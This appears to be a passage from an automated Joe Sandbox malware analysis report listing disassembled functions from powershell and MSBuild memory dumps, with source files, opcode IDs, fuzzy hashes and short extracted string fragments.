                                                                                  Process Activities

                                                                                  Show Windows behavior

                                                                                  Thread Activities

                                                                                  Show Windows behavior

                                                                                  Memory Activities

                                                                                  Show Windows behavior

                                                                                  System Activities

                                                                                  Network Activities


                                                                                  Disassembly

                                                                                  Executed Functions

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1356342445.00007FFC3DB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffc3db70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: F_E
                                                                                  • API String ID: 0-1692206208
                                                                                  • Opcode ID: 79ee7f1ea31acc95446ed124e5e8841e112c76a0ec5d9c1661ea1030100094b3
                                                                                  • Instruction ID: 3fe384491a80e1b5d3f1e444597b0873756e637a19560ec291cb310b25a7ae61
                                                                                  • Opcode Fuzzy Hash: 79ee7f1ea31acc95446ed124e5e8841e112c76a0ec5d9c1661ea1030100094b3
                                                                                  • Instruction Fuzzy Hash: 13923721E0DB9E4FEBA6D66858552B47BE1EF56254B0801FFC08DC71A3FD199C06C3A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1356342445.00007FFC3DB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffc3db70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 604fef7ac28704df89d33d3c15bcf3a9a58851f379a33915140475f6797a89f1
                                                                                  • Instruction ID: fcca05af126ca4a842d4693f9336d06772c59113a21a1157e9b83d45d02df514
                                                                                  • Opcode Fuzzy Hash: 604fef7ac28704df89d33d3c15bcf3a9a58851f379a33915140475f6797a89f1
                                                                                  • Instruction Fuzzy Hash: EB225821A0DBDE0FEB5A976848552B53FE1EF56294B0811FBD08DC70E3E9199C0AD372
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1355737684.00007FFC3DAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffc3daa0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c2c84dcf3db023dab1e280906a5914ebf56f89facce068f0e2b8c0707aa601ae
                                                                                  • Instruction ID: c78c0d112d01b1a3e823200d47d4f815190c5cca90fc96cfa0bc7598386406d8
                                                                                  • Opcode Fuzzy Hash: c2c84dcf3db023dab1e280906a5914ebf56f89facce068f0e2b8c0707aa601ae
                                                                                  • Instruction Fuzzy Hash: D4C2C570918A2D8FEBA8EB58C8957A9B7B1EF58341F5001FAD00DE3291DE356E81DF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1355737684.00007FFC3DAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffc3daa0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4a5edbf9c92c6af1e443e32cfcee5fabb155f682a101e3e1ec226a087f90ab6a
                                                                                  • Instruction ID: 1c2eec6d43a01a6c2959c4ac3b1f1017fb0fa3bd63143a6d6f6991f699fa9891
                                                                                  • Opcode Fuzzy Hash: 4a5edbf9c92c6af1e443e32cfcee5fabb155f682a101e3e1ec226a087f90ab6a
                                                                                  • Instruction Fuzzy Hash: A2D1A570A18A2D8FDBA9EB58C895BA9B7B5FF58301F5001E9D00DE3291DE356E81CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1356342445.00007FFC3DB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffc3db70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cd578dffa7e52963522a222499f8591f61c293f5efa24bd1d439c62da26cee60
                                                                                  • Instruction ID: 2ce5a350ad3ce321fc8e988736254ff2e47b5916eedaf6f59fa1ba598a417f61
                                                                                  • Opcode Fuzzy Hash: cd578dffa7e52963522a222499f8591f61c293f5efa24bd1d439c62da26cee60
                                                                                  • Instruction Fuzzy Hash: AA41DB92E0EEAF0BFBA9D268045517956D2EF651D4B5821BAC00DC71E2FD0C984DE237
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1355737684.00007FFC3DAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffc3daa0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f8d1b85085fe81c4b23bb787547d5d5f5f94e9ffc7809390ab9b0b86e7fd172d
                                                                                  • Instruction ID: ff8defaea7f6a974eed920e1b7fe91a88f32ae76974d6be35cf12f51d7ea192c
                                                                                  • Opcode Fuzzy Hash: f8d1b85085fe81c4b23bb787547d5d5f5f94e9ffc7809390ab9b0b86e7fd172d
                                                                                  • Instruction Fuzzy Hash: CE316D7090865E8FDB59DB54D855AFDBBF1FB54311F0042BAD00AD7291EA38A941CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1355737684.00007FFC3DAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffc3daa0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction ID: 8a41ef6b094a5331903104d7e9aa81d4bae9cd8f7ec86eccebd3d62f7cf12e36
                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction Fuzzy Hash: B401A73010CB0C8FD744EF0CE051AA5B7E0FB85360F10056DE58AC3651D632E881CB41
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1356342445.00007FFC3DB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffc3db70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cefbf6ddfd7a9ffaf0537baa3228acc5791174972e57a26eca1214e05e021e26
                                                                                  • Instruction ID: 3bfba143b1d83e0456505296341d85a59787bba95970fa5110a9e355f14e3e8e
                                                                                  • Opcode Fuzzy Hash: cefbf6ddfd7a9ffaf0537baa3228acc5791174972e57a26eca1214e05e021e26
                                                                                  • Instruction Fuzzy Hash: A2F05922F0C97E0BFEB4D26C28152F867D1EFB51A4B1802BBC88DD3146FC045C198382
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1355737684.00007FFC3DAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffc3daa0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 90d4575b0a0c9621813519069d2aabc804eead099f9a452830dbe93c3ba9a029
                                                                                  • Instruction ID: ed0b273d53c611664f9fc72cf57daab8e6960fd13b7505318327d99ea716fb4c
                                                                                  • Opcode Fuzzy Hash: 90d4575b0a0c9621813519069d2aabc804eead099f9a452830dbe93c3ba9a029
                                                                                  • Instruction Fuzzy Hash: 9AF03C74E0C11E8BDF28DA94C5918BDB7F2FB99310F10426DC00AA7280DE386941DB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1355737684.00007FFC3DAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffc3daa0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a9671485599b336cd68f02157575c7161054070d35f9aaddb8bb1720fc9fbcfb
                                                                                  • Instruction ID: d25e5a408577920aa70287df297a1d70a1dc55962251f07da74850299f6fe8b3
                                                                                  • Opcode Fuzzy Hash: a9671485599b336cd68f02157575c7161054070d35f9aaddb8bb1720fc9fbcfb
                                                                                  • Instruction Fuzzy Hash: 93D09235E0887DCF9F50EBD8D8042ECB7F0FB58351B000526D109E7200DB3098119B50

                                                                                  Non-executed Functions

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1355737684.00007FFC3DAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffc3daa0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4d1c69856b61ddb45c4e10e076f22397317e635f90bdf2749829da41a679d860
                                                                                  • Instruction ID: 63c4bc5621644a0f4e347af9dd4b374e29dcfa8a1f8276e8e12a100009c352da
                                                                                  • Opcode Fuzzy Hash: 4d1c69856b61ddb45c4e10e076f22397317e635f90bdf2749829da41a679d860
                                                                                  • Instruction Fuzzy Hash: 1221A13090E3DA8FD7138B7489641E57FB4AF13210F0846E7C085CF0E3E6295A49D762
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1355737684.00007FFC3DAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffc3daa0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3d11eeb51cf5ba3b7b5f1bbc91bed60d8aeb1b23c60fe6d7f5d26cfd7b100b5f
                                                                                  • Instruction ID: 57e34352fb30c470dd294d933df5308e4ed931870e819aa562b5ae165ad61021
                                                                                  • Opcode Fuzzy Hash: 3d11eeb51cf5ba3b7b5f1bbc91bed60d8aeb1b23c60fe6d7f5d26cfd7b100b5f
                                                                                  • Instruction Fuzzy Hash: AC01FC3091D2AD8FE7269B64D9106ECB7B4EB46340F0402B6C005DB1E2EF2CA209E3A1

                                                                                  Executed Functions

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: aq$ aq$,$xq$#q^$3q^
                                                                                  • API String ID: 0-4185940443
                                                                                  • Opcode ID: 014d3e0369fe55249c55d360ec0117ea2888ad447ccdeefb562997adeb30d543
                                                                                  • Instruction ID: da0c616f0b3cc73d5023ada49dbc45aa263bf20cf3c1c1e5e5bf78f035ea028d
                                                                                  • Opcode Fuzzy Hash: 014d3e0369fe55249c55d360ec0117ea2888ad447ccdeefb562997adeb30d543
                                                                                  • Instruction Fuzzy Hash: 3202B038B002019FDB15EB29D894B6E77E2BF84710F24866DD5119F3A5DFB5AC46CB80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (q$Teq
                                                                                  • API String ID: 0-2049869722
                                                                                  • Opcode ID: d3a32df4411e9bfbc9eb3a4c3287d423a9643c1306e85b4f39a66ba214381ab1
                                                                                  • Instruction ID: 97d12623a3bdbb9e09eba98f6c74bf11de9fad1f371cf8e59ee03692e9979b52
                                                                                  • Opcode Fuzzy Hash: d3a32df4411e9bfbc9eb3a4c3287d423a9643c1306e85b4f39a66ba214381ab1
                                                                                  • Instruction Fuzzy Hash: F6518A74B002049FD745DF79D454A5EBBF2BF89B00F2580AEE906EB3A2DA719D01CB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Hq$dLq
                                                                                  • API String ID: 0-4038822049
                                                                                  • Opcode ID: 10b45ed48160bdabb0975c4e0d82c830cca713b6c789c2eb099a2fe5ae09545f
                                                                                  • Instruction ID: 8bc2c32769c321707dcd174ef162f5f21cf36703db8e4e7f3861461e89ec92c3
                                                                                  • Opcode Fuzzy Hash: 10b45ed48160bdabb0975c4e0d82c830cca713b6c789c2eb099a2fe5ae09545f
                                                                                  • Instruction Fuzzy Hash: 0741C034B042048FDB15DF69D454A9EBBF6BF89214F1845AEE101EB3A2CA759C05CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LRq
                                                                                  • API String ID: 0-3187445251
                                                                                  • Opcode ID: 56b475717cf038d2ac992feb607137caee7a17160ba16ebc479f0d5f45c20b6e
                                                                                  • Instruction ID: 021bad0d014a313cbfd6b2e6754a5f777ac1ff433731ea71a1a31272e12c62e1
                                                                                  • Opcode Fuzzy Hash: 56b475717cf038d2ac992feb607137caee7a17160ba16ebc479f0d5f45c20b6e
                                                                                  • Instruction Fuzzy Hash: AC319A70F002158FCB44AB7D8851A6EBBF2BF89711B24456EE546DB3A5EE34DD028790
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: dLq
                                                                                  • API String ID: 0-2312315067
                                                                                  • Opcode ID: 80b6fe48482a8ab439f8793befefab9f0311a064cbc423876670ad0ffba93f7e
                                                                                  • Instruction ID: b183f6f77f104ad74525cd3ac82cdd1220477af50d7ac33c896139ee88acb5e0
                                                                                  • Opcode Fuzzy Hash: 80b6fe48482a8ab439f8793befefab9f0311a064cbc423876670ad0ffba93f7e
                                                                                  • Instruction Fuzzy Hash: A4319C39A00208CFDB14DF69C458BAEBBF2BF88310F18856AE501AB361CB749C45CB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Hq
                                                                                  • API String ID: 0-1594803414
                                                                                  • Opcode ID: 13e1e9bc81df8c8a2c4526c79d37ba4094d8b5439e35bf073085dcfcca452793
                                                                                  • Instruction ID: 39668b70657fd7d3bb508513b7c067af707c25bd12e41ed79a257a8d2d624813
                                                                                  • Opcode Fuzzy Hash: 13e1e9bc81df8c8a2c4526c79d37ba4094d8b5439e35bf073085dcfcca452793
                                                                                  • Instruction Fuzzy Hash: 9801D13070A3800FD34BAB39685059A3FA79FCB22436944EBE145CB3A7DE298C0683D1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3c7476512fc1cd06fa604ed77a2a6cc2b2cd167708e7ec1df031ab9bd0681216
                                                                                  • Instruction ID: 05b63f2fa20b13cb24e213c1afdc4b681acd8ed9e39ea2f50150f9121b51862c
                                                                                  • Opcode Fuzzy Hash: 3c7476512fc1cd06fa604ed77a2a6cc2b2cd167708e7ec1df031ab9bd0681216
                                                                                  • Instruction Fuzzy Hash: B051C338A01721CFCF6BEF3AF8889497763BB852157108768D4018B25DEB75AD4ACF91
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cf5dee53103110fefc665e9d4ac36ff30aeb918d08b81118cab01d4e33b35955
                                                                                  • Instruction ID: 8a1366935548c0679b372965abe714eedab4f1f9ab32bafe4ad1bce75b0763db
                                                                                  • Opcode Fuzzy Hash: cf5dee53103110fefc665e9d4ac36ff30aeb918d08b81118cab01d4e33b35955
                                                                                  • Instruction Fuzzy Hash: 87411D75F102389BEF189BA9DC54BDE77BBBB8C710F144119E805B3784CA756D028BA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3e1d3820f6fa9f59ede7185d590635a414a0602c0d49e0a648dae303f4bb5875
                                                                                  • Instruction ID: f69687a0e7322922058a7487d02880d78ec11c7a20a161a031931d6f3110744a
                                                                                  • Opcode Fuzzy Hash: 3e1d3820f6fa9f59ede7185d590635a414a0602c0d49e0a648dae303f4bb5875
                                                                                  • Instruction Fuzzy Hash: 6541BF74E00209AFCB44DBB988556AEBBF6FF88710F24856ED44AD7742DA349D42CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 661a9b0875d2b89aed2de24c45a7413980f1fd3f56427b538e132277f21ca140
                                                                                  • Instruction ID: 217c28cf4012258a50025183f483fce266e4ce025cfe1ce383b32758f9f80a9c
                                                                                  • Opcode Fuzzy Hash: 661a9b0875d2b89aed2de24c45a7413980f1fd3f56427b538e132277f21ca140
                                                                                  • Instruction Fuzzy Hash: FA41C33CB00601CFEBAAAB7E941463B3AA6BB50A04714563EE457C73A4EF34D9418B91
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1755c8600fcbec82c7b32b342fa23e66f6cb5ab865c6a75cab5464fb825dfc31
                                                                                  • Instruction ID: df4a5e9e026608eb55ecc1e923f6a09378b44b5e6752ae9ea1a53ae9e162fb9a
                                                                                  • Opcode Fuzzy Hash: 1755c8600fcbec82c7b32b342fa23e66f6cb5ab865c6a75cab5464fb825dfc31
                                                                                  • Instruction Fuzzy Hash: 2131933CB00701CFEBA9AF7E941463F7AA6BB50A04704563EA417C73A8EF30D8418B51
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 62115b41a6935e6f1e7fef787197c457d3c3d1604b968ad3f2f200f717ca82fd
                                                                                  • Instruction ID: e9b5d97fef5a42db401cbddd53a6dd28e14fd2c250d21f34203e4cf8b8a6ec7c
                                                                                  • Opcode Fuzzy Hash: 62115b41a6935e6f1e7fef787197c457d3c3d1604b968ad3f2f200f717ca82fd
                                                                                  • Instruction Fuzzy Hash: 43214B38B005059FE754DBA9C955BAE7BF2FF8CB20F248159E901AB3A5CE719C01CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2428946589.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10fd000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d6687f638f790c5e3bddd8e1746284aa0800f558aba38485e1f999c32e6df490
                                                                                  • Instruction ID: ccab86a316496913c2370a68f9afa92d984237a45622e1f1711ff5cb42832218
                                                                                  • Opcode Fuzzy Hash: d6687f638f790c5e3bddd8e1746284aa0800f558aba38485e1f999c32e6df490
                                                                                  • Instruction Fuzzy Hash: 342148B1500200DFDB15DF44D9C5B1ABFA1FB84718F24C1ADDA490F656C336E456CBA2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a1e7289f0c5c3327feb71f1833ab18bd7c534f96404227b728d21e2fc4d19895
                                                                                  • Instruction ID: 5fe60a3baba6ae771045b0b1341980bec41244e1070695b9eb6d1b07cb3c189f
                                                                                  • Opcode Fuzzy Hash: a1e7289f0c5c3327feb71f1833ab18bd7c534f96404227b728d21e2fc4d19895
                                                                                  • Instruction Fuzzy Hash: 78118279B006018FD709DF5EE581A46FBD7FBC4614708C22AD108DB759D670F801CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2428946589.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10fd000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 14c6bea1b0f6aaacb7db59bffceb06c36f0ab32707ada9f1390ddb9994ea60e7
                                                                                  • Instruction ID: 491822e9342c209a37febfc20a06a1de1161b017e3e4124f4d94c6dc24eaa89d
                                                                                  • Opcode Fuzzy Hash: 14c6bea1b0f6aaacb7db59bffceb06c36f0ab32707ada9f1390ddb9994ea60e7
                                                                                  • Instruction Fuzzy Hash: 4611D272404240CFCB16CF44D5C4B16BFA1FB84314F2881ADD9450B657C336D456CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b9408f0f9b0a8ff45f6d97fd59b07b1b8b30881c551f0cd31ce5c2f4d751578a
                                                                                  • Instruction ID: cfeac4262d242a0fb0db94794790fe58a1f6fda40534f5ed7a983d21b2b6b59b
                                                                                  • Opcode Fuzzy Hash: b9408f0f9b0a8ff45f6d97fd59b07b1b8b30881c551f0cd31ce5c2f4d751578a
                                                                                  • Instruction Fuzzy Hash: 95110E34B00211CFCB55EB79C815AAE7BF6EF88A1075844BDD406CB32ADA32D802CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0c0a1f36b900e55b2c7e01fe7b2321bdde6beb07df6153195f78e6774f010b35
                                                                                  • Instruction ID: b05ba173988b75e24c5421068f12d176e5ce036af6581ca3cc618696ab79b263
                                                                                  • Opcode Fuzzy Hash: 0c0a1f36b900e55b2c7e01fe7b2321bdde6beb07df6153195f78e6774f010b35
                                                                                  • Instruction Fuzzy Hash: 6A118B74B00215DFCB55EBBED91566A7BE6AF88A00718447DD406CB329EA35DD02CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f7932e39d0a7622c8c3eabc81ba975946cc464182e2289786ed62c93f7bf2a91
                                                                                  • Instruction ID: 2cf7b8392e0f1a5fff83604d21ee1ce9f809ec79264e3d72c7cf20d9c527092a
                                                                                  • Opcode Fuzzy Hash: f7932e39d0a7622c8c3eabc81ba975946cc464182e2289786ed62c93f7bf2a91
                                                                                  • Instruction Fuzzy Hash: 7E01D138C00719CFCB1AFBACE89866D7B72FF85300B404239D0125724CEB70A5458B92
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 563eeb89918f8b82c0c167d3c8a242317c99b5da493493729b485d8fe99b8b05
                                                                                  • Instruction ID: e1af13a2f3013a1fdc8280dfb371849ea3f65f600509233e50e7a2a08b7fbdfe
                                                                                  • Opcode Fuzzy Hash: 563eeb89918f8b82c0c167d3c8a242317c99b5da493493729b485d8fe99b8b05
                                                                                  • Instruction Fuzzy Hash: 20F02234C04758DFC70AFBACD8912AD7B71FF81704F00026AD05297349EA709549CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c974a5545454608443682a594297f8819f0030086449dd20dfbae7b75ec834f8
                                                                                  • Instruction ID: 5f0909642dfc3a5299b29e883e806459d76e98a308a794280824642067ca7b17
                                                                                  • Opcode Fuzzy Hash: c974a5545454608443682a594297f8819f0030086449dd20dfbae7b75ec834f8
                                                                                  • Instruction Fuzzy Hash: 5BC0122CD14148CAD3BA9BA4D4583687A11A74170EF60422AB16285565ADB404C68B12
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
